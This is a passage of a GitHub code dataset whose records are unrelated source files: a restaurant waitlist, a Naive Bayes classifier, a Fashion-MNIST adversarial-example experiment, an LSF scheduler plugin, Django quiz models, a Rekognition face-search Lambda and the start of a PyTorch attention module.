{res[0][1]} from {res[1][0]}, {res[1][1]}\")\nelse:\n print(\"nothing was found\")\n\n","repo_name":"MikitaTsiarentsyeu/Md-PT1-59-22","sub_path":"Lessons/lesson 26.11.22/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30303967594","text":"#Project: CIS 177 WEEK 9 PROJECT\n#Project Location: projects\\cis177\\LouiesBBQTracker\n#File: LouiesBBQTracker.py\n#Purpose: Keep track of a reservation list at Louie's BBQ,\n# keeping a VIP list as well\n#Revision: 1.0 / 27 MAR 2017\n#Created: 27 MAR 2017\n#Author: Rick Miller \n\nwaitlist = [] # This will be the waiting list for Louie's BBQ\n\n# This function will add a name to the end of the list. list.append will add the entry to the end of the list\n# NOTE: For accuracy, all user entries are converted to and stored as upper case, this will allow unambiguous entry of\n# a name to remove or find in other functions. 
This is because \"smith\", \"Smith\", \"SMITH\" and \"SmItH\" are all different\n# strings in python.\ndef add_name(my_list):\n nameToAdd = input('Enter the party\\'s name to add: ').upper()\n my_list.append(nameToAdd)\n\n# This function will add a name to the beginning of the given list. Note that list.insert(0) will add the entry\n# as the first entry in the list. Note that each VIP is simply added to the beginning of the list, without keeping\n# a separate VIP list\ndef add_VIP(my_list):\n nameToAdd = input('Enter the VIP party\\'s name to add: ').upper()\n my_list.insert(0, nameToAdd)\n\n# This function will remove a name from the given list. Note that the index function will return the first instance of the\n# entered name. It's up to the user to keep track of which real-life \"smith\" the user is sending away, for instance.\ndef remove_name(my_list):\n nameToRemove = input('Enter the name to remove: ').upper()\n if nameToRemove in my_list: # is the name on the list at least once?\n indexToRemove = my_list.index(nameToRemove) # if it is, then remove the first instance of that name\n my_list.pop(indexToRemove)\n else: # the name isn't on the list so tell the user\n print('Sorry,', nameToRemove,'not on the list.')\n\ndef table_ready(my_list):\n if len(my_list) > 0: # make sure the list isn't empty!\n tableName = my_list[0] # get the next name on the list\n print('A table is now ready for',tableName,'and that name has been removed from the list') # tell the user...\n my_list.pop(0) # ...and remove the name from the list\n else: # the list is empty, so tell the user\n print('\\nEMPTY')\n\ndef print_list(my_list):\n if len(my_list) > 0: # is there at least one name on the list?\n print('\\nCurrent list:') # if there is, print a header\n print('-------------')\n for name in my_list: # then for each name on the list...\n print(name) # ...print the names, one per line\n else: # nothing on the list, so tell the user\n print('\\nEMPTY')\n\ndef print_next_name(my_list):\n if len(my_list) > 0: # if the list isn't empty\n print('The next name on the list is:', my_list[0]) # ...so tell the user who the next person on the list is\n else: # the list is empty\n print('\\nEMPTY') # ...so tell the user\n\n# *** MAIN LOOP STARTS HERE! ***\n\nuserChoice = ''\n\nwhile userChoice != 'q': # this loop will repeat until the user selects 'q'\n print('\\nLouie\\'s BBQ Restaurant Reservation System') # print the menu\n print('\\nMain Menu\\n')\n print('A - Add a name to the list')\n print('V - Add a VIP to the list')\n print('R - Remove a name from the list')\n print('P - Print the list')\n print('N - Print the next party to get a table')\n print('T - Assign a table to the next party on the list')\n print('Q - Quit the program')\n userChoice = input('Please enter your selection: ')[0].lower()\n if userChoice in ('a', 'v', 'r', 'p', 'n', 't', 'q'): # check if the user has entered a valid choice\n if userChoice == 'a': # if the user has entered a valid choice, go to the right function\n add_name(waitlist)\n elif userChoice == 'v':\n add_VIP(waitlist)\n elif userChoice == 'r':\n remove_name(waitlist)\n elif userChoice == 't':\n table_ready(waitlist)\n elif userChoice == 'p':\n print_list(waitlist)\n elif userChoice == 'n':\n print_next_name(waitlist)\n else: # the user didn't make a valid choice. Note that 'q' is a valid choice but will bypass this message\n print('Sorry, invalid choice. 
+{"seq_id":"6032213118","text":"\"\"\"\nThis is an implementation of a Naive Bayes classifier under the following assumptions:\n    1) class labels can be approximated by the multinomial distribution\n    2) the likelihood of the class labels can be approximated by a Poisson\n       distribution with parameter lambda, for each class.\n    3) the parameter lambda has a prior gamma distribution with parameters (2, 1)\n\nThe maximum a posteriori estimates are then derived to learn the unknown parameters.\nThese are overly simplified and convenient assumptions, but usually perform well.\n\"\"\"\nfrom .General import *\n\n\ndef _get_class_probs(y):\n    \"\"\"\n    Gets the class proportions (class priors) for the target variable\n    :param y: n-length array of targets\n    :return: dictionary with keys = target variable,\n             values = target variable probability\n    \"\"\"\n    class_p = {}\n    for class_ in np.unique(y):\n        class_p[str(class_)] = (y == class_).sum() / len(y)\n    return class_p\n\n\ndef _get_class_lambdas(x, y):\n    \"\"\"\n    Gets the likelihood estimates for lambda parameter,\n    for each class in y.\n    :param x: n-by-d training data feature matrix\n    :param y: n-by-1 training data label vector\n    :return: dictionary where keys = class labels (as string)\n             and values = 1-by-d dimensional arrays\n    \"\"\"\n    class_lambdas = {}\n    for class_ in np.unique(y):\n        sub_x = x[y[:, 0] == class_]\n        class_lambdas[str(class_)] = (1 + sub_x.sum(axis=0)) / (len(sub_x) + 1)\n    return class_lambdas\n\n\ndef _get_likelihood(features, lambdas):\n    \"\"\"\n    Gets the likelihood probability estimate of a test set record\n    for a given set of lambda estimates for a given class\n    :param features: 1-by-d array of a test set record\n    :param lambdas: calculated lambda estimates\n    :return: the likelihood estimate (evaluated on a scaled Poisson)\n    \"\"\"\n    lamb_raise_x = lambdas ** features\n    exp_raise_lamb = np.exp(-1 * lambdas)\n    return (lamb_raise_x * exp_raise_lamb).prod()\n\n\ndef predict(x_0, class_p, class_lambdas):\n    \"\"\"\n    Evaluates the MAP solution for a given test set record,\n    based on learned parameters.\n    :param x_0: 1-by-d array of test record features\n    :param class_p: class probability estimates\n    :param class_lambdas: dictionary of learned lambdas\n    :return: highest probability prediction\n    \"\"\"\n    max_prob = -1\n    prediction = None\n\n    for class_ in class_lambdas:\n        likelihood = _get_likelihood(x_0, class_lambdas[class_])\n        class_prob = class_p[class_]\n        posterior = likelihood * class_prob\n\n        if posterior > max_prob:\n            prediction = int(class_)\n            max_prob = posterior\n\n    return prediction\n\n\ndef train(x_train, y_train):\n    \"\"\"\n    Learns the prior distribution of class and the MAP estimates\n    for lambdas in each class under the assumptions outlined at\n    the top of this file\n    :param x_train: n-by-d matrix of training feature data\n    :param y_train: n-by-1 array of training labels\n    :return: dictionary of multinomial class probabilities and\n             dictionary of learned lambda parameters for all\n             feature dimensions for each class\n    \"\"\"\n    return _get_class_probs(y_train), _get_class_lambdas(x_train, y_train)\n\n\ndef naive_bayes(x, y, cv=1, test_prop=0.2, scale=False, neg=0,\n                randomize=True, poly_expand=1, accuracy=True):\n    \"\"\"\n    Performs Naive Bayes (multi-class) classification and returns scores\n    (accuracy or confusion matrix).\n\n    Can also specify whether to scale the data, perform cross validation,\n    or whether to perform a polynomial expansion of given degree on the\n    feature space.\n\n    :param x: feature data matrix\n    :param y: target array\n    :param cv: integer number of cross validation folds\n    :param test_prop: test proportion when CV = 1\n    :param scale: boolean indicating whether to standardize features\n    :param randomize: boolean indicating whether to shuffle data\n    :param poly_expand: degree number to expand feature space\n    :param neg: negative class label in target array; used for confusion matrix\n    :param accuracy: boolean; if changed to False and it's binary classification,\n                     then will return confusion matrix instead of accuracy.\n    :return: list of accuracy scores for each test set evaluation, unless\n             accuracy == False and it's a binary classification problem - then\n             it will return a list of confusion matrices\n    \"\"\"\n    # expand feature space by polynomial\n    x = expand_features(x, poly_expand, False)\n\n    # determine bin sizes for cross validation splits\n    bin_sizes = get_bin_sizes(len(y), cv, test_prop)\n\n    # permute order for cross validation\n    order = np.random.permutation(len(y)) if randomize else np.arange(0, len(y))\n\n    # initialize list to store accuracies OR confusion matrices from each split\n    scores = []\n\n    for split in range(cv):\n        # get train-test split and standardize if scale = True\n        x_test, y_test, x_train, y_train = get_split(x, y, bin_sizes, order, split)\n        x_train, x_test = standardize(x_train, x_test) if scale else (x_train, x_test)\n\n        # train model on data\n        class_p, class_lambdas = train(x_train, y_train)\n\n        # predict, append confusion matrix to scores list\n        y_pred = np.array([predict(row, class_p, class_lambdas) for row in x_test]).reshape(-1, 1)\n\n        if accuracy or len(class_p) != 2:\n            scores.append(((y_test - y_pred) == 0).sum()/len(y_pred))\n        else:\n            scores.append(get_conf_mat(y_pred, y_test, neg))\n\n    return scores\n\n","repo_name":"PGrantcharov/ml-package","sub_path":"mlAlgos/NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":5603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
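The (1 + sum) / (n + 1) expression in _get_class_lambdas above is exactly the MAP estimate under the stated assumptions: a Poisson likelihood with a Gamma(2, 1) prior yields a Gamma(2 + sum(x), 1 + n) posterior, whose mode is (2 + sum(x) - 1) / (1 + n). A quick numeric check (hypothetical counts):

import numpy as np

x = np.array([3, 0, 2, 5])                         # hypothetical counts for one feature
lam_map = (1 + x.sum()) / (len(x) + 1)             # the estimate used in _get_class_lambdas
posterior_mode = (2 + x.sum() - 1) / (1 + len(x))  # mode of Gamma(2 + sum(x), 1 + n)
assert np.isclose(lam_map, posterior_mode)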
+{"seq_id":"74951265746","text":"\"\"\"\nUse fast gradient sign method to craft adversarial examples on MNIST.\n\nDependencies: python3, tensorflow v1.4, numpy, matplotlib\n\"\"\"\nimport os\n\nimport numpy as np\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\n\nimport tensorflow as tf\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras import backend as K\n# import the TensorBoard callback\nfrom keras.callbacks import TensorBoard\n# from tensorflow import keras\nfrom fgsm import *\n\n\nimg_rows = 28\nimg_cols = 28\nimg_channel = 1\nnum_classes = 10\nbatch_size = 128\nepochs = 1\neps = 0.5\nprint('\\nLoading Fashion MNIST')\n\n# preprocess data\nfashion_mnist = keras.datasets.fashion_mnist\n(X_train, Y_train), (X_test, Y_test) = fashion_mnist.load_data()\n\nif K.image_data_format() == 'channels_first':\n    X_train = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)\n    X_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)\n    input_shape = (1, img_rows, img_cols)\nelse:\n    X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)
\n    X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)\n    input_shape = (img_rows, img_cols, 1)\n\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train /= 255\nX_test /= 255\n\nto_categorical = keras.utils.to_categorical\nY_train = to_categorical(Y_train)\nY_test = to_categorical(Y_test)\n\nprint('\\nSplitting data')\n\nind = np.random.permutation(X_train.shape[0])\nX_train, Y_train = X_train[ind], Y_train[ind]\n\n# split the data into a 20% validation set and an 80% training set\nVALIDATION_SPLIT = 0.2\nn = int(X_train.shape[0] * (1-VALIDATION_SPLIT))\nX_valid = X_train[n:]\nX_train = X_train[:n]\nY_valid = Y_train[n:]\nY_train = Y_train[:n]\n\nprint('X_train shape:', X_train.shape)\nprint(X_train.shape[0], 'train samples')\nprint(X_valid.shape[0], 'valid samples')\nprint(X_test.shape[0], 'test samples')\n\nprint('\\nConstructing graph')\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n               'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3),\n                 activation='relu',\n                 input_shape=input_shape))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n#model.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.25))\nmodel.add(Dense(num_classes, activation='softmax'))\n\nmodel.compile(loss=keras.losses.categorical_crossentropy,\n              optimizer=keras.optimizers.Adadelta(),\n              metrics=['accuracy'])\n\ntbCallBack = TensorBoard(log_dir='./logs', # log directory\n                         histogram_freq=0,\n                         write_images=True)\n\nmodel.fit(X_train, Y_train,\n          batch_size=batch_size,\n          epochs=epochs, \n          verbose=1,\n          validation_data=(X_valid, Y_valid),\n          callbacks=[tbCallBack])\n\nscore = model.evaluate(X_test, Y_test, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n\npredictions = model.predict(X_test)\nprint(\"predictions 0\", predictions[0])\nprint(\"labels 0\", Y_test[0])\n#loss = tf.nn.softmax_cross_entropy_with_logits(labels=target, logits=logits)\ndef plot_image(i, predictions_array, true_label, img):\n    predictions_array, true_label_array, img = predictions_array[i], true_label[i], img[i]\n    plt.grid(False)\n    plt.xticks([])\n    plt.yticks([])\n    d = img.reshape(28,28)\n    #print(\"img 0\", img)\n    plt.imshow(d, cmap=\"gray\")\n\n    predicted_label = np.argmax(predictions_array)\n    true_label = np.argmax(true_label_array)\n    print(\"predicted_label true_label\", predicted_label, true_label)\n    if predicted_label == true_label:\n        color = 'blue'\n    else:\n        color = 'red'\n\n    plt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label],\n                                         100*np.max(predictions_array),\n                                         class_names[true_label]),\n                                         color=color)\n\ndef plot_value_array(i, predictions_array, true_label):\n    predictions_array, true_label_array = predictions_array[i], true_label[i]\n    plt.grid(False)\n    plt.xticks([])\n    plt.yticks([])\n    thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n    plt.ylim([0, 1])\n    predicted_label = np.argmax(predictions_array)\n    true_label = np.argmax(true_label_array)\n    thisplot[predicted_label].set_color('red')\n    thisplot[true_label].set_color('blue')\n\n# i = 0\n# plt.figure(figsize=(6,3))\n# plt.subplot(1,2,1)\n# plot_image(i, predictions, Y_test, X_test)\n# plt.subplot(1,2,2)\n# plot_value_array(i, predictions, Y_test)\n# plt.show()\n\norigin = X_test[0]\n#x = tf.placeholder(tf.float32, (None, img_rows, img_cols, img_channel), name='x')\nxadv = tf.identity(origin)\nprint(\"xadv\", xadv)\ntarget = Y_test[0]\nlogits = predictions[0]\nloss = tf.nn.softmax_cross_entropy_with_logits(labels=target, logits=logits)\ndy_dx, = tf.gradients(loss, xadv)\nxadv = tf.stop_gradient(xadv + eps*tf.sign(dy_dx))\nprint(\"xadv\", xadv)\n# xadv = tf.clip_by_value(xadv, 0.1, 1)\n\n# plt.figure(figsize=(6,3))\n# plt.subplot(2,2,1)\n# plt.imshow(origin.reshape(28,28), cmap=\"gray\")\n# plt.subplot(2,2,2)\n# plt.imshow(xadv.reshape(28,28), cmap=\"gray\")\n# plt.show()","repo_name":"fishlao/master_homework","sub_path":"deep_learning/fgsm_attack/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
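In the record above, `logits = predictions[0]` is a precomputed numpy array, so the loss is constant with respect to `xadv` and `tf.gradients(loss, xadv)` returns None before the `tf.sign` call. A hedged sketch of a connected FGSM graph, assuming TF1 graph mode and the `model`, `eps`, and shape constants defined in that record (the model's final softmax output stands in for raw logits here, as it does in the original):

x = tf.placeholder(tf.float32, (None, img_rows, img_cols, img_channel), name='x')
y = tf.placeholder(tf.float32, (None, num_classes), name='y')
probs = model(x)  # call the Keras model on the placeholder to keep the graph connected
loss = tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=probs)
grad, = tf.gradients(loss, x)
x_adv = tf.stop_gradient(x + eps * tf.sign(grad))  # x_adv = x + eps * sign(dJ/dx)
# optionally keep pixels in range: x_adv = tf.clip_by_value(x_adv, 0., 1.)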
+{"seq_id":"32391622644","text":"from OptimalArray.Utilities.CorMat import CovCM4Global,CovCM4Indian,CovCM4SO,CovCM4NAtlantic,CovCM4TropicalAtlantic,CovCM4SAtlantic,CovCM4NPacific,CovCM4TropicalPacific,CovCM4SPacific,CovCM4GOM,CovCM4CCS\nimport matplotlib.pyplot as plt\nimport cartopy.crs as ccrs\n\n\n\ndef plot_cov(self):\n\tplottable = self.trans_geo.transition_vector_to_plottable(self.diagonal())\n\tXX,YY,ax = self.trans_geo.plot_setup()\n\tax.pcolormesh(XX,YY,plottable,vmax = (plottable.mean()+(3*plottable.std())))\n\n\nfor covclass in [CovCM4Global,CovCM4Indian,CovCM4SO,CovCM4NAtlantic,CovCM4TropicalAtlantic,CovCM4SAtlantic,CovCM4NPacific,CovCM4TropicalPacific,CovCM4SPacific,CovCM4GOM,CovCM4CCS]:\n\tfor depth in [2,4,6,8,10,12,14,16,18,20]:\n\t\tdummy = covclass(depth_idx = depth)\n\t\tfor var_1 in dummy.trans_geo.variable_list:\n\t\t\tfor var_2 in dummy.trans_geo.variable_list:\n\t\t\t\ttry:\n\t\t\t\t\tcov = dummy.get_cov(var_1,var_2)\n\t\t\t\t\tidx_1 = dummy.trans_geo.variable_list.index(var_1)\n\t\t\t\t\tidx_2 = dummy.trans_geo.variable_list.index(var_2)\n\t\t\t\texcept FileNotFoundError:\n\t\t\t\t\tcov = dummy.get_cov(var_2,var_1)\n\t\t\t\t\tidx_1 = dummy.trans_geo.variable_list.index(var_2)\n\t\t\t\t\tidx_2 = dummy.trans_geo.variable_list.index(var_1)\n\t\t\t\tcov.plot_cov = plot_cov\n\t\t\t\tcov.plot_cov(cov)\n\t\t\t\tplt.savefig(dummy.trans_geo.file_handler.out_file(\"cov_\" + var_1 + \"_\" + var_2))\n\t\t\t\tplt.close()","repo_name":"Chamberpain/OptimalArray","sub_path":"Utilities/Diagnostics.py","file_name":"Diagnostics.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
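A worked example (hypothetical numbers, not from the source) of the per-process arithmetic in the ETHZ Euler LSF scheduler record that follows, where memory and scratch are reserved in MB per CPU:

physical_memory_kb = 8388608   # hypothetical request: 8 GiB in total
num_mpiprocs = 4
mem_per_proc_mb = physical_memory_kb // (1024 * num_mpiprocs)  # -> 2048
rusage_line = '#BSUB -R "rusage[mem={},scratch={}]"'.format(
    mem_per_proc_mb, 2 * mem_per_proc_mb)
# rusage_line == '#BSUB -R "rusage[mem=2048,scratch=4096]"'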
+{"seq_id":"37881401611","text":"from aiida.schedulers.plugins.lsf import LsfScheduler\n\n\nclass ETHZEulerLsfScheduler(LsfScheduler):\n    \"\"\"\n    The ETHZ Euler LSF scheduler requires memory and scratch space to be\n    reserved with the line\n    #BSUB -R \"rusage[mem=X,scratch=Y]\"\n    where X and Y are specified in units of MB per cpu\n    \"\"\"\n\n    def _get_submit_script_header(self, job_tmpl):\n        if job_tmpl.max_memory_kb:\n            lsf_script_lines = super()._get_submit_script_header(job_tmpl).splitlines()\n\n            physical_memory_kb = int(job_tmpl.max_memory_kb)\n            num_mpiprocs = job_tmpl.job_resource.get_tot_num_mpiprocs()\n            mem_per_proc_mb = physical_memory_kb // (1024 * num_mpiprocs)\n\n            rusage_added = False\n            new_lines = []\n            for line in lsf_script_lines:\n                if line.startswith(\"#BSUB -M\"):\n                    # Skip the BSUB -M line.\n                    continue\n                if not line.startswith(\"#\") and not rusage_added:\n                    # Add the rusage line after the other #BSUB commands.\n                    rusage_line = '#BSUB -R \"rusage[mem={},scratch={}]\"'.format(\n                        mem_per_proc_mb, 2 * mem_per_proc_mb\n                    )\n                    new_lines.append(rusage_line)\n                    rusage_added = True\n\n                new_lines.append(line)\n\n            return \"\\n\".join(new_lines)\n\n        # If memory is not specified, just use the default LSF script.\n        return super()._get_submit_script_header(job_tmpl)\n","repo_name":"nanotech-empa/aiida-nanotech-empa","sub_path":"aiida_nanotech_empa/schedulers/lsf_ethz_euler.py","file_name":"lsf_ethz_euler.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"3048209572","text":"from src.logger.logger import Logging\nfrom sqlalchemy import select\nfrom src.database.core.engine import SQLEngine\nfrom src.database.tables.setup import LogsTable\nfrom src.settings.logs import settingLogs\n\n\nasync def logs_memory_cache(bot):\n    db_conn = SQLEngine.engine.connect()\n\n    query = select(LogsTable)\n    logs = db_conn.execute(query).all()\n\n    if not logs:\n        Logging().info(\"No logs to load in cache\")\n        return\n\n    for log in logs:\n        await settingLogs.set_logs(\n            bot=bot,\n            server_id=log[1],\n            log_channel_id=log[2],\n            log_config_int=log[3]\n        )\n    Logging().info(\"All logs in cache\")\n\n\ndef setup(bot):\n    pass\n","repo_name":"Nyria-Development/Bot-Nyria","sub_path":"bot/metrio/logs/listeners/logsMemoryCache.py","file_name":"logsMemoryCache.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"38308309924","text":"# NLP 100 Exercises\r\n# \r\n# 36. Word frequency\r\n# Find the words that appear in the text and their frequencies, and list them in descending order of frequency.\r\n\r\nfrom nlp030 import read_mecab\r\n\r\n\r\nfile_name = \"neko.txt.mecab\"\r\nall_sentences = read_mecab(file_name)\r\n\r\ndef word_freq(all_sentences):\r\n    \"\"\"\r\n    Compute word frequencies from the output of read_mecab().\r\n    Record them in a dictionary, then convert them to a list of tuples\r\n    sorted by frequency in descending order and return it.\r\n    args:\r\n        all_sentences: list, a list in the format produced by read_mecab()\r\n    return:\r\n        freq_list_desc: list, a list of (word, frequency) tuples (in descending order of frequency)\r\n    \"\"\"\r\n    freq_dic = {}\r\n    for sentence in all_sentences:\r\n        for morph in sentence:\r\n            freq_dic[morph[\"surface\"]] = freq_dic.get(morph[\"surface\"], 0) + 1\r\n    freq_list_desc = sorted(freq_dic.items(), key=lambda x :x[1], reverse=True)\r\n    # return freq_dic\r\n    return freq_list_desc\r\n\r\nif __name__ == '__main__':\r\n    file_name = \"neko.txt.mecab\"\r\n    all_sentences = read_mecab(file_name)\r\n    freq_list_desc = word_freq(all_sentences)\r\n    for i in freq_list_desc:\r\n        print(\"{}:{}\".format(i[0], i[1]))\r\n","repo_name":"JaChaika/NLP100","sub_path":"04/nlp036.py","file_name":"nlp036.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15826309502","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.utils.timezone import now\n\n#Questions\nclass QuestionData(models.Model):\n\tANSWER_CHOICES=(\n\t\t(\"A\", (\"A\")),\n\t\t(\"B\", (\"B\")),\n\t\t(\"C\", (\"C\")),\n\t\t(\"D\", (\"D\")),\n\t\t)\n\tid_no=models.CharField(max_length=1000,primary_key=True)\n\tquestion=models.TextField()\n\toptionA=models.TextField()\n\toptionB=models.TextField()\n\toptionC=models.TextField()\n\toptionD=models.TextField()\n\tcorrect_choice=models.CharField(choices=ANSWER_CHOICES, max_length=10, null=False)\n\n\n#Time Interval Of Quiz\nclass Time(models.Model):\n\tstart_time = models.DateTimeField(max_length=100, blank=False, default=now)\n\tend_time = models.DateTimeField(max_length=100, blank=False, default=now)\n\n\tdef __str__(self):\n\t\treturn str(self.end_time)\n\n\t\t\n#Scored Card + Solved\nclass 
SolvedQ(models.Model):\n\tid_no=models.ForeignKey(User, on_delete=models.CASCADE)\n\tq_id=models.ForeignKey(QuestionData, on_delete=models.CASCADE)\n\tcheck=models.BooleanField(default=False)\n\t","repo_name":"abhinavsharma629/Quiz-Portal","sub_path":"quizportal/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31316496961","text":"import os\n\nfrom urllib.parse import unquote_plus\nimport boto3\n\nclient = boto3.client(\"rekognition\")\n\nCOLLECTION_ID = os.environ[\"REKOGNITION_COLLECTION_ID\"]\n\n\ndef handler(event, context):\n bucket = event[\"bucket\"]\n key = unquote_plus(event[\"key\"])\n\n # Detect the faces\n response = client.search_faces_by_image(\n CollectionId=COLLECTION_ID,\n Image={\"S3Object\": {\"Bucket\": bucket, \"Name\": key}},\n MaxFaces=1,\n FaceMatchThreshold=90.0,\n )\n\n if not response[\"FaceMatches\"]:\n return {\"exists\": False}\n else:\n return {\n \"exists\": True,\n \"user_id\": response[\"FaceMatches\"][0][\"Face\"][\"ExternalImageId\"],\n }\n","repo_name":"Zangror/rekognition-demo","sub_path":"lambdas/rekognition/face_search.py","file_name":"face_search.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42813387426","text":"class Vehicle:\n\n def __init__(self, name: str):\n self.name = name\n self.frame = None\n self.engine = None\n self.wheels = None\n self.doors = None\n\n def print(self):\n print(\"__{4}__\\n frame:{0} \\\n \\n engine:{1} \\n wheels:{2} \\n doors:{3} \\n\".format(\n self.frame, self.engine,\n self.wheels, self.doors, self.name))\n\n def get(self):\n return {\n \"name\": self.name,\n \"frame\": self.frame,\n \"engine\": self.engine,\n \"wheels\": self.wheels,\n \"doors\": self.doors\n }\n","repo_name":"mpilkou/design-patterns","sub_path":"1_Builder/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18446525600","text":"import cv2\nfrom sklearn.cluster import KMeans\n\nfrom config import *\nfrom domain.detector.shape.squaredetector import SquareDetector\nfrom domain.detector.worldelement.iworldelementdetector import IWorldElementDetector\nfrom domain.world.drawingarea import DrawingArea\n\n\nclass NoDrawingAreaFoundError(Exception):\n pass\n\n\ndef closest_node(node, nodes):\n nodes = np.asarray(nodes)\n dist_2 = np.sum((nodes - node) ** 2, axis=1)\n return np.argmin(dist_2)\n\n\nclass DrawingAreaDetector(IWorldElementDetector):\n def __init__(self, shape_factory):\n self._shape_factory = shape_factory\n\n def detect(self, image):\n mask = self._threshold_green(image)\n drawing_area = self._find_drawing_area(mask)\n return drawing_area\n\n def _threshold_green(self, image):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(image, LOWER_GREEN_HSV, UPPER_GREEN_HSV)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, ksize=(3, 3))\n mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)\n mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel=kernel, iterations=3)\n return mask\n\n def _find_drawing_area(self, image):\n squares = SquareDetector(self._shape_factory).detect(image)\n if len(squares) > 0:\n inner, outer = self._get_inner_and_outer_edges(squares)\n return DrawingArea(inner, outer)\n else:\n raise NoDrawingAreaFoundError\n\n def 
_get_inner_and_outer_edges(self, squares):\n sq = np.array([[2, square.area()] for square in squares])\n\n kmeans = KMeans(n_clusters=2, random_state=0).fit(sq)\n\n mean_inner_square = kmeans.cluster_centers_[0]\n mean_outer_square = kmeans.cluster_centers_[1]\n\n inner_index = closest_node(mean_inner_square, sq)\n outer_index = closest_node(mean_outer_square, sq)\n\n return squares[inner_index], squares[outer_index]\n","repo_name":"jenifaelle/design3-vision","sub_path":"src/domain/detector/worldelement/drawingareadetector.py","file_name":"drawingareadetector.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39133435296","text":"import torch\nimport copy\nfrom typing import Optional, Any, Union, Callable, Tuple\nimport torch\nfrom torch import Tensor\nfrom torch.nn import functional as F\nfrom torch.nn import Module\nfrom torch.nn import ModuleList\nfrom torch.nn.init import xavier_uniform_\nfrom torch.nn import Dropout\nfrom torch.nn import Linear\nfrom torch.nn import LayerNorm\nfrom torch.nn.parameter import Parameter\nfrom torch.nn.init import constant_, xavier_normal_, xavier_uniform_\n\n\nclass NonDynamicallyQuantizableLinear(Linear):\n def __init__(self, in_features: int, out_features: int, bias: bool = True) -> None:\n super().__init__(in_features, out_features, bias=bias)\n \n\ndef _get_clones(module, N):\n return ModuleList([copy.deepcopy(module) for i in range(N)])\n\nclass MultiheadAttention(Module):\n r\"\"\"Allows the model to jointly attend to information\n from different representation subspaces.\n See `Attention Is All You Need `_.\n\n .. math::\n \\text{MultiHead}(Q, K, V) = \\text{Concat}(head_1,\\dots,head_h)W^O\n\n where :math:`head_i = \\text{Attention}(QW_i^Q, KW_i^K, VW_i^V)`.\n\n Args:\n embed_dim: Total dimension of the model.\n num_heads: Number of parallel attention heads. Note that ``embed_dim`` will be split\n across ``num_heads`` (i.e. each head will have dimension ``embed_dim // num_heads``).\n dropout: Dropout probability on ``attn_output_weights``. Default: ``0.0`` (no dropout).\n bias: If specified, adds bias to input / output projection layers. Default: ``True``.\n add_bias_kv: If specified, adds bias to the key and value sequences at dim=0. Default: ``False``.\n add_zero_attn: If specified, adds a new batch of zeros to the key and value sequences at dim=1.\n Default: ``False``.\n kdim: Total number of features for keys. Default: ``None`` (uses ``kdim=embed_dim``).\n vdim: Total number of features for values. Default: ``None`` (uses ``vdim=embed_dim``).\n batch_first: If ``True``, then the input and output tensors are provided\n as (batch, seq, feature). 
